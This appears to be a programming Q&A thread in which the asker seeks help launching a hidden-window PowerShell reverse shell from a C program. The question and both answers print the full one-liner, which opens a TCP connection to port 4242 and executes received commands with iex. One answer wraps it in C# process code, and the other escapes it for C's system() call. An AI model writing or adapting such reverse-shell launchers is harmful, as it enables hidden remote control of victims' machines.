# How do i run this one liner powershell reverse shell using C Language

Tags: python, c, powershell

I tried using executing system command but C is not understanding when i past powershell into `system("");`

powershell reverse shell:

```
 powershell -W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

when i use this rev shell into python using subprocess module, it work fine when i specify this `subprocess.call(''' ''')`

Help me to use this rev shell in C:

Answer (score 0):

Im not 100% sure but i had a similar problem a while ago with excecuting a powershellscript from C#. Maybe something like that works in c too. C# Code:

```
var startInfo = new ProcessStartInfo()
    {
        FileName = "powershell.exe",
        Arguments = $"-W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"",
        UseShellExecute = false
    };
    Process.Start(startInfo);
```

Answer (score 0):

It is not quite sufficient to blindly *past*e *powershell into `system("");`* - you have to mask each embedded `"` with `\`:

```
system("powershell -W Hidden -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");
```

And you should review that command - you probably don't want the `enter code here` therein.